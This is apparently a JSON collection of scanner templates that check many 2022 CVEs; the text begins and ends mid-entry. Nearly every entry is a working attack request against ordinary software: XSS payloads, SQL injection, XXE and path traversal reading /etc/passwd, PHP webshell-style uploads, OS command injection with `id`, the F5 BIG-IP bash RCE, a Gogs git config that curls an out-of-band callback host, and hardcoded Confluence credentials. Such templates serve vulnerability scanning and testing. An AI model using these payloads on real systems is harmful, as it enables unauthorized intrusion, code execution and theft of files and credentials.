'colspan=\\\"2\\\"><script>alert(document.domain)</script></th>')"],"condition":"and"}]}]},{"id":"CVE-2022-23808","info":{"name":"phpMyAdmin < 5.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","<h2>Add a new server</h2>","<title>phpMyAdmin setup"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33965","info":{"name":"WordPress Visitor Statistics <=5.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"regex","regex":["^1331' and sleep\\(5\\) or '$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2414","info":{"name":"FreeIPA - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /ca/rest/certrequests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<CertEnrollmentRequest>\n  <Attributes/>\n  <ProfileID>&ent;</ProfileID>\n</CertEnrollmentRequest>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["PKIException"]},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-0415","info":{"name":"Gogs <0.12.6 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/upload-file HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Requested-With: XMLHttpRequest\nX-Csrf-Token: {{auth_csrf}}\nContent-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395\n\n-----------------------------313811965223810628771946318395\nContent-Disposition: form-data; name=\"file\"; filename=\"config\"\nContent-Type: application/octet-stream\n\n[core]\n    repositoryformatversion = 0\n    filemode = true\n    bare = false\n    logallrefupdates = true\n    ignorecase = true\n    precomposeunicode = true\n    sshCommand = curl http://{{interactsh-url}} -I\n[remote \"origin\"]\n    url = git@github.com:torvalds/linux.git\n    fetch = +refs/heads/*:refs/remotes/origin/*\n[branch \"master\"]\n    remote = origin\n    merge = refs/heads/master\n-----------------------------313811965223810628771946318395--\n","POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"uuid","group":1,"regex":[" \"uuid\": \"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-39195","info":{"name":"LISTSERV 17 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40879","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>=PQ</p>","\u8be5\u6587\u4ef6\u4e0d"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29455","info":{"name":"WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '<= 3.5.5')"]},{"type":"word","part":"body","words":["Elementor Website Builder"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2022-32026","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47966","info":{"name":"ManageEngine - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /SamlResponseServlet HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Unknown error occurred while processing your request"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-4328","info":{"name":"WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------22728be7b3104597\n\n--------------------------22728be7b3104597\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"CVE-2022-4328\"); ?>\n\n--------------------------22728be7b3104597--\n","GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fe5df26ce4ca0056ffae8854469c282f"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23134","info":{"name":"Zabbix Setup Configuration Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/setup.php","{{BaseURL}}/setup.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"},"matchers-condition":"and","matchers":[{"type":"word","words":["Database","host","port","Zabbix"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29272","info":{"name":"Nagios XI <5.8.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"nsp_token","group":1,"regex":["<input type=\"hidden\" name=\"nsp\" value=\"(.*)\">","<input type='hidden' name='nsp' value='(.*)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-26138","info":{"name":"Atlassian Questions For Confluence - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action\n"],"payloads":{"os_username":["disabledsystemuser"],"os_password":["disabled1system1user6708"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["location == \"/httpvoid.action\""]}]}]},{"id":"CVE-2022-44947","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=&notes=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-32025","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}%23&password={{password}}\n","GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30513","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45835","info":{"name":"WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["cURL Test for PhonePe"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1597","info":{"name":"WordPress WPQA <5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{redirect_to}}","\"success\":1"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40022","info":{"name":"Symmetricom SyncServer Unauthenticated - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /controller/ping.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/controller/ping.php\n\ncurrentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+)"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-40734","info":{"name":"Laravel Filemanager v2.5.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd","{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"],"stop-at-first-match":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-1388","info":{"name":"F5 BIG-IP iControl - REST Auth Bypass RCE","severity":"critical"},"requests":[{"raw":["POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: localhost\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["commandResult","8831-2202-EVC"],"condition":"and"}]}]},{"id":"CVE-2022-2487","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /cgi-bin/nightled.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=night_led&start_hour=;{{cmd}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","nightStart"],"condition":"and"},{"type":"word","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24384","info":{"name":"SmarterTools SmarterTrack - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /Main/Default.aspx?viewSurveyError=Unknown+survey\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n\n"],"matchers":[{"type":"word","words":["\"type\":\"error\",\"text\":\"Unknown survey\\\"><img src=x onerror=alert(document.domain)>\"","smartertrack"],"condition":"and"}]}]},{"id":"CVE-2022-34590","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hms/admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Admin  | Dashboard</title>","Manage Patients","Manage Doctors"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36804","info":{"name":"Atlassian Bitbucket - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /rest/api/latest/repos HTTP/1.1\nHost: {{Hostname}}\n","GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","words":["com.atlassian.bitbucket.scm.CommandFailedException"]},{"type":"status","status":[500]}],"extractors":[{"type":"json","name":"key","internal":true,"json":[".[\"values\"] | .[] | .[\"project\"] | .key"],"part":"body"},{"type":"json","name":"slug","internal":true,"json":[".[\"values\"] | .[]  | .slug"],"part":"body"},{"type":"regex","group":1,"regex":["uid=.*\\(([a-z]+)\\):"]}]}]},{"id":"CVE-2022-0540","info":{"name":"Atlassian Jira Seraph - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General Insight Configuration"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1162","info":{"name":"GitLab CE/EE - Hard-Coded Credentials","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-0412","info":{"name":"WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(5)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["Product not found"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-32772","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertInfo(\"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38467","info":{"name":"CRM Perks Forms < 1.1.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(content_type_2, \"text/html\")","contains(body_1, \"CRM Perks Forms\") && contains(body_2, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0378","info":{"name":"Microweber Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["mwui_init","onmousemove=\"alert(document.domain)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2314","info":{"name":"WordPress VR Calendar <=2.3.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["phpinfo","PHP Version"],"condition":"and"},{"type":"word","part":"body_1","words":["vrc-calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31846","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/live_mfg.shtml"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","DefaultIP=","LOGO1="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0346","info":{"name":"WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp","{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5(\"CVE-2022-0346\");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp"],"stop-at-first-match":true,"req-condition":true,"matchers":[{"type":"word","part":"body_1","words":["<img src onerror=alert(document.domain)>","Invalid Provider type specified"],"condition":"and"},{"type":"word","part":"body_2","words":["2ef3baa95802a4b646f2fc29075efe34"]}]}]},{"id":"CVE-2022-25485","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertLightbox.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2733","info":{"name":"Openemr < 7.0.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/interface/login/login.php?site=default\n\nnew_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.cookie)>","pricelevel"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24288","info":{"name":"Apache Airflow OS Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command","{{BaseURL}}/code?dag_id=example_passing_params_via_test_command"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["foo was passed in via Airflow CLI Test command with value {{ params.foo }}"]}]}]},{"id":"CVE-2022-43140","info":{"name":"kkFileView 4.1.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"],"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2022-27849","info":{"name":"WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Chat Log\"","\"User IP\"","\"User ID\""],"condition":"and"},{"type":"word","part":"header","words":["text/csv"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3980","info":{"name":"Sophos Mobile managed on-premises - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["@timeout: 50s\nPOST /servlets/OmaDsServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: \"application/xml\"\n\n<?xml version=\"1.0\"?>\n<!DOCTYPE cdl [<!ENTITY % test SYSTEM \"http://{{interactsh-url}}\">%test;]>\n<cdl>test</cdl>\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')","status_code == 400","len(body) == 0"],"condition":"and"}]}]},{"id":"CVE-2022-0149","info":{"name":"WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0786","info":{"name":"WordPress KiviCare <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Doctor details\")"],"condition":"and"}]}]},{"id":"CVE-2022-2551","info":{"name":"WordPress Duplicator <1.4.7 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1","{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href='../installer.php'>restart this install process</a>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3484","info":{"name":"WordPress WPB Show Core - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"wpb_jplayer_setting\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-30777","info":{"name":"Parallels H-Sphere 3.6.1713 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44948","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST 